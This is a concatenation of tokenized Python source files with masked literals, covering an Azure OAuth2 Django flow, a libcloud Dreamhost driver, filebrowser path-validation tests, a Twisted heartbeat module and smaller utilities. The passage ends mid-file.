<s> import pyinotify <EOL> wm = pyinotify . WatchManager ( ) <EOL> r = wm . add_watch ( [ '<STR_LIT>' , '<STR_LIT>' ] , pyinotify . ALL_EVENTS ) <EOL> print r <EOL> try : <EOL> wm . add_watch ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> pyinotify . ALL_EVENTS , quiet = False ) <EOL> except pyinotify . WatchManagerError , err : <EOL> print err , err . wmd <EOL> try : <EOL> wm . update_watch ( <NUM_LIT> , mask = <NUM_LIT> , quiet = False ) <EOL> except pyinotify . WatchManagerError , err : <EOL> print err , err . wmd <EOL> try : <EOL> wm . rm_watch ( <NUM_LIT> , quiet = False ) <EOL> except pyinotify . WatchManagerError , err : <EOL> print err , err . wmd </s>
<s> from xml . dom . minidom import parseString <EOL> from django . shortcuts import render , redirect <EOL> import requests <EOL> from requests_oauthlib import OAuth2Session <EOL> from django . conf import settings <EOL> import logging <EOL> logging . basicConfig ( level = logging . INFO ) <EOL> def getText ( nodelist ) : <EOL> rc = [ ] <EOL> for node in nodelist : <EOL> if node . nodeType == node . TEXT_NODE : <EOL> rc . append ( node . data ) <EOL> return '<STR_LIT>' . join ( rc ) <EOL> def index ( request ) : <EOL> context = { '<STR_LIT>' : '<STR_LIT>' } <EOL> return render ( request , '<STR_LIT>' , context ) <EOL> def step1 ( request ) : <EOL> constants = settings . CONSTANTS <EOL> CLIENT_ID = constants [ '<STR_LIT>' ] <EOL> STEP_1_TEMPLATE_NAME = constants [ '<STR_LIT>' ] <EOL> REDIRECT_URI = constants [ '<STR_LIT>' ] <EOL> AUTHORIZATION_BASE_URL = constants [ '<STR_LIT>' ] <EOL> context = { '<STR_LIT>' : '<STR_LIT>' } <EOL> if request . method == '<STR_LIT:GET>' : <EOL> return render ( request , STEP_1_TEMPLATE_NAME , context ) <EOL> elif request . method == '<STR_LIT:POST>' : <EOL> azure_session = OAuth2Session ( CLIENT_ID , redirect_uri = REDIRECT_URI ) <EOL> authorization_url , state = azure_session . authorization_url ( AUTHORIZATION_BASE_URL % '<STR_LIT>' ) <EOL> resp = requests . get ( authorization_url ) <EOL> return redirect ( resp . url ) <EOL> def step2 ( request ) : <EOL> constants = settings . CONSTANTS <EOL> STEP_2_TEMPLATE_NAME = constants [ '<STR_LIT>' ] <EOL> STEP_3_TEMPLATE_NAME = constants [ '<STR_LIT>' ] <EOL> BASE_TOKEN_URL = constants [ '<STR_LIT>' ] <EOL> REDIRECT_URI = constants [ '<STR_LIT>' ] <EOL> CLIENT_ID = constants [ '<STR_LIT>' ] <EOL> CLIENT_KEY = constants [ '<STR_LIT>' ] <EOL> RESOURCE_URI = constants [ '<STR_LIT>' ] <EOL> context = { '<STR_LIT>' : '<STR_LIT>' } <EOL> azure_session = OAuth2Session ( CLIENT_ID , redirect_uri = REDIRECT_URI ) <EOL> if request . method == '<STR_LIT:GET>' : <EOL> aad_code = request . GET . 
get ( '<STR_LIT:code>' , '<STR_LIT>' ) <EOL> request . session [ '<STR_LIT>' ] = aad_code <EOL> context [ '<STR_LIT>' ] = aad_code <EOL> return render ( request , STEP_2_TEMPLATE_NAME , context ) <EOL> elif request . method == '<STR_LIT:POST>' : <EOL> aad_code = request . session [ '<STR_LIT>' ] <EOL> token_dict = azure_session . fetch_token ( BASE_TOKEN_URL % '<STR_LIT>' , code = aad_code , client_secret = CLIENT_KEY , resource = RESOURCE_URI ) <EOL> request . session [ '<STR_LIT>' ] = token_dict <EOL> context [ '<STR_LIT>' ] = token_dict <EOL> return render ( request , STEP_3_TEMPLATE_NAME , context ) <EOL> def step3 ( request ) : <EOL> constants = settings . CONSTANTS <EOL> STEP_3_TEMPLATE_NAME = constants [ '<STR_LIT>' ] <EOL> STEP_4_TEMPLATE_NAME = constants [ '<STR_LIT>' ] <EOL> CLIENT_ID = constants [ '<STR_LIT>' ] <EOL> REDIRECT_URI = constants [ '<STR_LIT>' ] <EOL> GET_SUBSCRIPTIONS_URL = constants [ '<STR_LIT>' ] <EOL> MS_API_VERSION_HEADER = constants [ '<STR_LIT>' ] <EOL> MS_API_VERSION_HEADER_VALUE = constants [ '<STR_LIT>' ] <EOL> context = { '<STR_LIT>' : '<STR_LIT>' } <EOL> if request . method == '<STR_LIT:GET>' : <EOL> return render ( request , STEP_3_TEMPLATE_NAME , context ) <EOL> elif request . method == '<STR_LIT:POST>' : <EOL> token = request . session [ '<STR_LIT>' ] <EOL> azure_session = OAuth2Session ( CLIENT_ID , redirect_uri = REDIRECT_URI , token = token ) <EOL> resp = azure_session . get ( GET_SUBSCRIPTIONS_URL , headers = { MS_API_VERSION_HEADER : MS_API_VERSION_HEADER_VALUE } ) <EOL> dom = parseString ( resp . content ) <EOL> subscriptions = dom . getElementsByTagName ( "<STR_LIT>" ) <EOL> output = [ ] <EOL> tenantText = '<STR_LIT>' <EOL> for subscription in subscriptions : <EOL> name = subscription . getElementsByTagName ( "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> nameText = getText ( name . childNodes ) <EOL> output . append ( nameText ) <EOL> tenantid = subscription . 
getElementsByTagName ( "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> tenantText = getText ( tenantid . childNodes ) <EOL> output . append ( tenantText ) <EOL> context [ '<STR_LIT>' ] = output <EOL> request . session [ '<STR_LIT>' ] = tenantText <EOL> return render ( request , STEP_4_TEMPLATE_NAME , context ) <EOL> def step4 ( request ) : <EOL> constants = settings . CONSTANTS <EOL> STEP_4_TEMPLATE_NAME = constants [ '<STR_LIT>' ] <EOL> STEP_5_TEMPLATE_NAME = constants [ '<STR_LIT>' ] <EOL> REDIRECT_URI = constants [ '<STR_LIT>' ] <EOL> BASE_TOKEN_URL = constants [ '<STR_LIT>' ] <EOL> CLIENT_ID = constants [ '<STR_LIT>' ] <EOL> CLIENT_KEY = constants [ '<STR_LIT>' ] <EOL> RESOURCE_URI = constants [ '<STR_LIT>' ] <EOL> context = { '<STR_LIT>' : '<STR_LIT>' } <EOL> if request . method == '<STR_LIT:GET>' : <EOL> return render ( request , STEP_4_TEMPLATE_NAME , context ) <EOL> elif request . method == '<STR_LIT:POST>' : <EOL> tenantid = request . session [ '<STR_LIT>' ] <EOL> aad_code = request . session [ '<STR_LIT>' ] <EOL> azure_session = OAuth2Session ( CLIENT_ID , redirect_uri = REDIRECT_URI ) <EOL> token_dict = azure_session . fetch_token ( BASE_TOKEN_URL % tenantid , code = aad_code , client_secret = CLIENT_KEY , resource = RESOURCE_URI ) <EOL> context [ '<STR_LIT>' ] = token_dict <EOL> return render ( request , STEP_5_TEMPLATE_NAME , context ) <EOL> def step1_live ( request ) : <EOL> constants = settings . CONSTANTS <EOL> CLIENT_ID = constants [ '<STR_LIT>' ] <EOL> STEP_1_TEMPLATE_NAME = constants [ '<STR_LIT>' ] <EOL> REDIRECT_URI = constants [ '<STR_LIT>' ] <EOL> AUTHORIZATION_BASE_URL = constants [ '<STR_LIT>' ] <EOL> context = { '<STR_LIT>' : '<STR_LIT>' } <EOL> if request . method == '<STR_LIT:GET>' : <EOL> return render ( request , STEP_1_TEMPLATE_NAME , context ) <EOL> elif request . method == '<STR_LIT:POST>' : <EOL> tenant_name = request . POST [ '<STR_LIT>' ] <EOL> logging . 
info ( '<STR_LIT>' + tenant_name ) <EOL> resource_name = tenant_name + '<STR_LIT>' <EOL> request . session [ '<STR_LIT>' ] = resource_name <EOL> azure_session = OAuth2Session ( CLIENT_ID , redirect_uri = REDIRECT_URI ) <EOL> authorization_url , state = azure_session . authorization_url ( AUTHORIZATION_BASE_URL % resource_name ) <EOL> resp = requests . get ( authorization_url ) <EOL> return redirect ( resp . url ) <EOL> def step2_live ( request ) : <EOL> constants = settings . CONSTANTS <EOL> STEP_2_TEMPLATE_NAME = constants [ '<STR_LIT>' ] <EOL> STEP_3_TEMPLATE_NAME = constants [ '<STR_LIT>' ] <EOL> BASE_TOKEN_URL = constants [ '<STR_LIT>' ] <EOL> REDIRECT_URI = constants [ '<STR_LIT>' ] <EOL> CLIENT_ID = constants [ '<STR_LIT>' ] <EOL> CLIENT_KEY = constants [ '<STR_LIT>' ] <EOL> RESOURCE_URI = constants [ '<STR_LIT>' ] <EOL> context = { '<STR_LIT>' : '<STR_LIT>' } <EOL> azure_session = OAuth2Session ( CLIENT_ID , redirect_uri = REDIRECT_URI ) <EOL> if request . method == '<STR_LIT:GET>' : <EOL> aad_code = request . GET . get ( '<STR_LIT:code>' , '<STR_LIT>' ) <EOL> request . session [ '<STR_LIT>' ] = aad_code <EOL> context [ '<STR_LIT>' ] = aad_code <EOL> return render ( request , STEP_2_TEMPLATE_NAME , context ) <EOL> elif request . method == '<STR_LIT:POST>' : <EOL> aad_code = request . session [ '<STR_LIT>' ] <EOL> resource_name = request . session [ '<STR_LIT>' ] <EOL> token_dict = azure_session . fetch_token ( BASE_TOKEN_URL % resource_name , code = aad_code , client_secret = CLIENT_KEY , resource = RESOURCE_URI ) <EOL> request . session [ '<STR_LIT>' ] = token_dict <EOL> context [ '<STR_LIT>' ] = token_dict <EOL> return render ( request , STEP_3_TEMPLATE_NAME , context ) <EOL> def step3_live ( request ) : <EOL> constants = settings . 
CONSTANTS <EOL> STEP_3_TEMPLATE_NAME = constants [ '<STR_LIT>' ] <EOL> STEP_4_TEMPLATE_NAME = constants [ '<STR_LIT>' ] <EOL> CLIENT_ID = constants [ '<STR_LIT>' ] <EOL> REDIRECT_URI = constants [ '<STR_LIT>' ] <EOL> GET_SUBSCRIPTIONS_URL = constants [ '<STR_LIT>' ] <EOL> MS_API_VERSION_HEADER = constants [ '<STR_LIT>' ] <EOL> MS_API_VERSION_HEADER_VALUE = constants [ '<STR_LIT>' ] <EOL> context = { '<STR_LIT>' : '<STR_LIT>' } <EOL> if request . method == '<STR_LIT:GET>' : <EOL> return render ( request , STEP_3_TEMPLATE_NAME , context ) <EOL> elif request . method == '<STR_LIT:POST>' : <EOL> token = request . session [ '<STR_LIT>' ] <EOL> azure_session = OAuth2Session ( CLIENT_ID , redirect_uri = REDIRECT_URI , token = token ) <EOL> resp = azure_session . get ( GET_SUBSCRIPTIONS_URL , headers = { MS_API_VERSION_HEADER : MS_API_VERSION_HEADER_VALUE } ) <EOL> dom = parseString ( resp . content ) <EOL> subscriptions = dom . getElementsByTagName ( "<STR_LIT>" ) <EOL> output = [ ] <EOL> tenantText = '<STR_LIT>' <EOL> for subscription in subscriptions : <EOL> name = subscription . getElementsByTagName ( "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> nameText = getText ( name . childNodes ) <EOL> output . append ( nameText ) <EOL> tenantid = subscription . getElementsByTagName ( "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> tenantText = getText ( tenantid . childNodes ) <EOL> output . append ( tenantText ) <EOL> context [ '<STR_LIT>' ] = output <EOL> request . session [ '<STR_LIT>' ] = tenantText <EOL> return render ( request , STEP_4_TEMPLATE_NAME , context ) <EOL> def step4_live ( request ) : <EOL> constants = settings . 
CONSTANTS <EOL> STEP_4_TEMPLATE_NAME = constants [ '<STR_LIT>' ] <EOL> STEP_5_TEMPLATE_NAME = constants [ '<STR_LIT>' ] <EOL> REDIRECT_URI = constants [ '<STR_LIT>' ] <EOL> BASE_TOKEN_URL = constants [ '<STR_LIT>' ] <EOL> CLIENT_ID = constants [ '<STR_LIT>' ] <EOL> CLIENT_KEY = constants [ '<STR_LIT>' ] <EOL> RESOURCE_URI = constants [ '<STR_LIT>' ] <EOL> context = { '<STR_LIT>' : '<STR_LIT>' } <EOL> if request . method == '<STR_LIT:GET>' : <EOL> return render ( request , STEP_4_TEMPLATE_NAME , context ) <EOL> elif request . method == '<STR_LIT:POST>' : <EOL> tenantid = request . session [ '<STR_LIT>' ] <EOL> aad_code = request . session [ '<STR_LIT>' ] <EOL> azure_session = OAuth2Session ( CLIENT_ID , redirect_uri = REDIRECT_URI ) <EOL> token_dict = azure_session . fetch_token ( BASE_TOKEN_URL % tenantid , code = aad_code , client_secret = CLIENT_KEY , resource = RESOURCE_URI ) <EOL> context [ '<STR_LIT>' ] = token_dict <EOL> return render ( request , STEP_5_TEMPLATE_NAME , context ) </s>
<s> from redis_cache . backends . single import RedisCache <EOL> from redis_cache . backends . multiple import ShardedRedisCache <EOL> from redis_cache . backends . dummy import RedisDummyCache </s>
<s> """<STR_LIT>""" <EOL> from libcloud . base import ConnectionKey , Response , NodeDriver , Node <EOL> from libcloud . base import NodeSize , NodeImage <EOL> from libcloud . types import Provider , NodeState , InvalidCredsException <EOL> try : <EOL> import json <EOL> except : <EOL> import simplejson as json <EOL> """<STR_LIT>""" <EOL> DH_PS_SIZES = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:15> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:200> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None <EOL> } , <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT:default>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1000> , <EOL> '<STR_LIT>' : <NUM_LIT:50> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None <EOL> } , <EOL> } <EOL> class DreamhostAPIException ( Exception ) : <EOL> def __str__ ( self ) : <EOL> return self . args [ <NUM_LIT:0> ] <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . args [ <NUM_LIT:0> ] ) <EOL> class DreamhostResponse ( Response ) : <EOL> """<STR_LIT>""" <EOL> def parse_body ( self ) : <EOL> resp = json . loads ( self . body ) <EOL> if resp [ '<STR_LIT:result>' ] != '<STR_LIT:success>' : <EOL> raise Exception ( self . 
_api_parse_error ( resp ) ) <EOL> return resp [ '<STR_LIT:data>' ] <EOL> def parse_error ( self ) : <EOL> raise Exception <EOL> def _api_parse_error ( self , response ) : <EOL> if '<STR_LIT:data>' in response : <EOL> if response [ '<STR_LIT:data>' ] == '<STR_LIT>' : <EOL> raise InvalidCredsException ( "<STR_LIT>" ) <EOL> else : <EOL> raise DreamhostAPIException ( response [ '<STR_LIT:data>' ] ) <EOL> else : <EOL> raise DreamhostAPIException ( "<STR_LIT>" % ( self . body ) ) <EOL> class DreamhostConnection ( ConnectionKey ) : <EOL> """<STR_LIT>""" <EOL> host = '<STR_LIT>' <EOL> responseCls = DreamhostResponse <EOL> format = '<STR_LIT>' <EOL> def add_default_params ( self , params ) : <EOL> """<STR_LIT>""" <EOL> params [ '<STR_LIT:key>' ] = self . key <EOL> params [ '<STR_LIT>' ] = self . format <EOL> return params <EOL> class DreamhostNodeDriver ( NodeDriver ) : <EOL> """<STR_LIT>""" <EOL> type = Provider . DREAMHOST <EOL> name = "<STR_LIT>" <EOL> connectionCls = DreamhostConnection <EOL> _sizes = DH_PS_SIZES <EOL> def create_node ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> size = kwargs [ '<STR_LIT:size>' ] . ram <EOL> params = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT:type>' : kwargs [ '<STR_LIT:image>' ] . name , <EOL> '<STR_LIT:size>' : size <EOL> } <EOL> data = self . connection . request ( '<STR_LIT:/>' , params ) . object <EOL> return Node ( <EOL> id = data [ '<STR_LIT>' ] , <EOL> name = data [ '<STR_LIT>' ] , <EOL> state = NodeState . PENDING , <EOL> public_ip = [ ] , <EOL> private_ip = [ ] , <EOL> driver = self . connection . driver , <EOL> extra = { <EOL> '<STR_LIT:type>' : kwargs [ '<STR_LIT:image>' ] . name <EOL> } <EOL> ) <EOL> def destroy_node ( self , node ) : <EOL> params = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : node . id <EOL> } <EOL> try : <EOL> return self . connection . request ( '<STR_LIT:/>' , params ) . 
success ( ) <EOL> except DreamhostAPIException : <EOL> return False <EOL> def reboot_node ( self , node ) : <EOL> params = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : node . id <EOL> } <EOL> try : <EOL> return self . connection . request ( '<STR_LIT:/>' , params ) . success ( ) <EOL> except DreamhostAPIException : <EOL> return False <EOL> def list_nodes ( self , ** kwargs ) : <EOL> data = self . connection . request ( '<STR_LIT:/>' , { '<STR_LIT>' : '<STR_LIT>' } ) . object <EOL> return [ self . _to_node ( n ) for n in data ] <EOL> def list_images ( self , ** kwargs ) : <EOL> data = self . connection . request ( '<STR_LIT:/>' , { '<STR_LIT>' : '<STR_LIT>' } ) . object <EOL> images = [ ] <EOL> for img in data : <EOL> images . append ( NodeImage ( <EOL> id = img [ '<STR_LIT:image>' ] , <EOL> name = img [ '<STR_LIT:image>' ] , <EOL> driver = self . connection . driver <EOL> ) ) <EOL> return images <EOL> def list_sizes ( self , ** kwargs ) : <EOL> return [ NodeSize ( driver = self . connection . driver , ** i ) <EOL> for i in self . _sizes . values ( ) ] <EOL> def list_locations ( self , ** kwargs ) : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def _resize_node ( self , node , size ) : <EOL> if ( size < <NUM_LIT> or size > <NUM_LIT> ) : <EOL> return False <EOL> params = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : node . id , <EOL> '<STR_LIT:size>' : size <EOL> } <EOL> try : <EOL> return self . connection . request ( '<STR_LIT:/>' , params ) . success ( ) <EOL> except DreamhostAPIException : <EOL> return False <EOL> def _to_node ( self , data ) : <EOL> """<STR_LIT>""" <EOL> return Node ( <EOL> id = data [ '<STR_LIT>' ] , <EOL> name = data [ '<STR_LIT>' ] , <EOL> state = NodeState . UNKNOWN , <EOL> public_ip = [ data [ '<STR_LIT>' ] ] , <EOL> private_ip = [ ] , <EOL> driver = self . connection . 
driver , <EOL> extra = { <EOL> '<STR_LIT>' : data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : data [ '<STR_LIT>' ] , <EOL> '<STR_LIT:type>' : data [ '<STR_LIT:type>' ] <EOL> } <EOL> ) </s>
<s> from __future__ import print_function <EOL> import logging , sys , types , os . path , re <EOL> from ConfigParser import RawConfigParser , NoOptionError <EOL> log = logging . getLogger ( '<STR_LIT>' . format ( __name__ ) ) <EOL> log . addHandler ( logging . NullHandler ( ) ) <EOL> class ConfigError ( Exception ) : <EOL> def __init__ ( self , msg ) : <EOL> Exception . __init__ ( self , msg ) <EOL> class Config : <EOL> def __init__ ( self , path , section = "<STR_LIT>" ) : <EOL> self . path = path <EOL> self . section = section <EOL> if not os . path . isfile ( path ) : <EOL> raise IOError ( "<STR_LIT>" . format ( path ) ) <EOL> self . parser = RawConfigParser ( allow_no_value = True ) <EOL> self . parser . read ( self . path ) <EOL> def _get ( self , opt ) : <EOL> """<STR_LIT>""" <EOL> return self . parser . get ( self . section , opt ) <EOL> def _getflag ( self , opt , log_msg = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return self . _get ( opt ) is None <EOL> except NoOptionError : <EOL> if log_msg : <EOL> log . info ( log_msg ) <EOL> return False <EOL> def _getfile ( self , opt ) : <EOL> filename = self . _get ( opt ) <EOL> if filename and os . path . isfile ( filename ) : <EOL> return filename <EOL> else : <EOL> raise self . config_error ( "<STR_LIT>" . format ( opt , filename ) ) <EOL> def config_error ( self , msg ) : <EOL> return ConfigError ( '<STR_LIT>' . format ( self . path , msg ) ) <EOL> def set_logging ( log , loglevelnum , logfile , verbose_console = False ) : <EOL> """<STR_LIT>""" <EOL> if not loglevelnum in [ logging . NOTSET , logging . DEBUG , logging . INFO , logging . WARNING , logging . ERROR , logging . CRITICAL ] : <EOL> log . error ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> try : <EOL> log . setLevel ( logging . DEBUG ) <EOL> fh = logging . FileHandler ( logfile ) <EOL> fh . setLevel ( loglevelnum ) <EOL> fh . setFormatter ( logging . Formatter ( '<STR_LIT>' ) ) <EOL> log . addHandler ( fh ) <EOL> ch = logging . 
StreamHandler ( ) <EOL> if verbose_console : <EOL> ch . setLevel ( logging . DEBUG ) <EOL> else : <EOL> ch . setLevel ( logging . ERROR ) <EOL> ch . setFormatter ( logging . Formatter ( '<STR_LIT>' ) ) <EOL> log . addHandler ( ch ) <EOL> logging . getLogger ( '<STR_LIT>' ) . addHandler ( fh ) <EOL> except IOError , e : <EOL> msg = str ( e ) <EOL> if e . errno == <NUM_LIT> : <EOL> msg += '<STR_LIT>' <EOL> raise ConfigError ( msg ) </s>
<s> from __future__ import print_function <EOL> from nba_py import player <EOL> ap = player . PlayerList ( ) <EOL> print ( ap . info ( ) ) <EOL> pc = player . PlayerSummary ( '<STR_LIT>' ) <EOL> print ( pc . headline_stats ( ) ) <EOL> p_cstats = player . PlayerCareer ( '<STR_LIT>' ) <EOL> print ( p_cstats . regular_season_career_totals ( ) ) </s>
<s> import os <EOL> import sys <EOL> try : <EOL> from setuptools import setup <EOL> except ImportError : <EOL> from distutils . core import setup <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) ) <EOL> from version import VERSION <EOL> long_description = '''<STR_LIT>''' <EOL> install_requires = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> extras_require = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] <EOL> } <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = VERSION , <EOL> url = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> maintainer = '<STR_LIT>' , <EOL> maintainer_email = '<STR_LIT>' , <EOL> test_suite = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> license = '<STR_LIT>' , <EOL> install_requires = install_requires , <EOL> extras_require = extras_require , <EOL> description = '<STR_LIT>' , <EOL> long_description = long_description , <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> ) </s>
<s> import shutil <EOL> from filebrowser . decorators import get_path , get_file <EOL> from filebrowser . sites import site <EOL> from tests import FilebrowserTestCase as TestCase <EOL> class GetPathTests ( TestCase ) : <EOL> def test_empty ( self ) : <EOL> self . assertEqual ( get_path ( '<STR_LIT>' , site ) , '<STR_LIT>' ) <EOL> def test_starts_with_period ( self ) : <EOL> self . assertIsNone ( get_path ( '<STR_LIT:..>' , site ) ) <EOL> self . assertIsNone ( get_path ( '<STR_LIT>' , site ) ) <EOL> def test_is_absolute ( self ) : <EOL> self . assertIsNone ( get_path ( '<STR_LIT>' , site ) ) <EOL> self . assertIsNone ( get_path ( '<STR_LIT>' , site ) ) <EOL> def test_does_not_exist ( self ) : <EOL> self . assertIsNone ( get_path ( '<STR_LIT>' , site ) ) <EOL> def test_valid ( self ) : <EOL> self . assertTrue ( get_path ( '<STR_LIT>' , site ) ) <EOL> class GetFileTests ( TestCase ) : <EOL> def test_empty ( self ) : <EOL> self . assertEqual ( get_file ( '<STR_LIT>' , '<STR_LIT>' , site ) , '<STR_LIT>' ) <EOL> def test_starts_with_period ( self ) : <EOL> self . assertIsNone ( get_file ( '<STR_LIT:.>' , '<STR_LIT>' , site ) ) <EOL> def test_filename_starts_with_period ( self ) : <EOL> self . assertIsNone ( get_file ( '<STR_LIT>' , '<STR_LIT>' , site ) ) <EOL> def test_is_absolute ( self ) : <EOL> self . assertIsNone ( get_file ( '<STR_LIT>' , '<STR_LIT:password>' , site ) ) <EOL> self . assertIsNone ( get_file ( '<STR_LIT>' , '<STR_LIT>' , site ) ) <EOL> def test_filename_is_absolute ( self ) : <EOL> self . assertIsNone ( get_file ( '<STR_LIT>' , '<STR_LIT>' , site ) ) <EOL> def test_does_not_exist ( self ) : <EOL> self . assertIsNone ( get_file ( '<STR_LIT>' , '<STR_LIT>' , site ) ) <EOL> self . assertIsNone ( get_file ( '<STR_LIT>' , '<STR_LIT>' , site ) ) <EOL> def test_valid_folder ( self ) : <EOL> self . assertTrue ( get_file ( '<STR_LIT>' , '<STR_LIT>' , site ) ) <EOL> def test_valid_file ( self ) : <EOL> self . 
assertIsNone ( get_file ( '<STR_LIT>' , '<STR_LIT>' , site ) ) <EOL> shutil . copy ( self . STATIC_IMG_PATH , self . SUBFOLDER_PATH ) <EOL> self . assertTrue ( get_file ( '<STR_LIT>' , '<STR_LIT>' , site ) ) </s>
<s> from zope . interface import implements <EOL> from nodeset . core import interfaces <EOL> class NodeMonitor : <EOL> implements ( interfaces . heartbeat . INodeMonitor ) <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , node ) : <EOL> self . node = node <EOL> self . __ok = [ ] <EOL> self . __fails = [ ] <EOL> def heartbeat ( self ) : <EOL> d = self . node . callRemote ( '<STR_LIT>' ) <EOL> for callable , args , kwargs in self . __ok : <EOL> d . addCallback ( callable , * args , ** kwargs ) <EOL> for callable , args , kwargs in self . __fails : <EOL> d . addErrback ( callable , * args , ** kwargs ) <EOL> def onOk ( self , callable , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . __ok . append ( ( callable , args , kwargs ) ) <EOL> return self <EOL> def onFail ( self , callable , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . __fails . append ( ( callable , args , kwargs ) ) <EOL> return self <EOL> class NodeHeartBeat : <EOL> implements ( interfaces . heartbeat . INodeHeartBeat ) <EOL> def __init__ ( self , dispatcher ) : <EOL> self . monitors = set ( ) <EOL> self . dispatcher = dispatcher <EOL> self . delayed = None <EOL> def cancel ( self ) : <EOL> if self . delayed and self . delayed . active ( ) : <EOL> self . delayed . cancel ( ) <EOL> def _lookup ( self , node ) : <EOL> """<STR_LIT>""" <EOL> for m in self . monitors : <EOL> if m . node == node : <EOL> return m <EOL> raise KeyError ( "<STR_LIT>" % node ) <EOL> def has ( self , node ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> m = self . _lookup ( node ) <EOL> return True <EOL> except KeyError , e : <EOL> return False <EOL> def add ( self , node ) : <EOL> """<STR_LIT>""" <EOL> monitor = node . monitor or NodeMonitor ( node ) <EOL> self . monitors . add ( monitor ) <EOL> return monitor <EOL> def remove ( self , node ) : <EOL> """<STR_LIT>""" <EOL> monitor = node . monitor or self . _lookup ( node ) <EOL> self . monitors . 
remove ( monitor ) <EOL> return monitor <EOL> def schedule ( self , delay = <NUM_LIT:5> ) : <EOL> """<STR_LIT>""" <EOL> from twisted . internet import reactor <EOL> self . delayed = reactor . callLater ( delay , self . _do_heartbeat ) <EOL> def _do_heartbeat ( self ) : <EOL> """<STR_LIT>""" <EOL> monitors = self . monitors . copy ( ) <EOL> for m in monitors : <EOL> m . heartbeat ( ) <EOL> del monitors <EOL> self . schedule ( ) </s>
<s> from twisted . trial import unittest <EOL> from twisted . internet import defer <EOL> from nodeset . core import config <EOL> from nodeset . common . twistedapi import NodeSetAppOptions <EOL> class ConfigurationTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> cfg = NodeSetAppOptions ( ) <EOL> cfg . parseOptions ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . config = config . Configurator ( ) <EOL> self . config . _config = cfg <EOL> def testListenParam ( self ) : <EOL> self . assertTrue ( self . config [ '<STR_LIT>' ] == '<STR_LIT>' ) <EOL> def testDispatcherParam ( self ) : <EOL> self . assertTrue ( self . config [ '<STR_LIT>' ] == '<STR_LIT>' ) <EOL> def testAnotherInstance ( self ) : <EOL> c = config . Configurator ( ) <EOL> self . assertTrue ( c [ '<STR_LIT>' ] == '<STR_LIT>' ) <EOL> def testUpdate ( self ) : <EOL> self . config [ '<STR_LIT>' ] = '<STR_LIT:value>' <EOL> self . assertTrue ( self . config [ '<STR_LIT>' ] == '<STR_LIT:value>' ) <EOL> def testAnotherRoutine ( self ) : <EOL> def anotherRoutine ( d ) : <EOL> c = config . Configurator ( ) <EOL> self . assertTrue ( c [ '<STR_LIT>' ] == '<STR_LIT>' ) <EOL> self . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> d = defer . Deferred ( 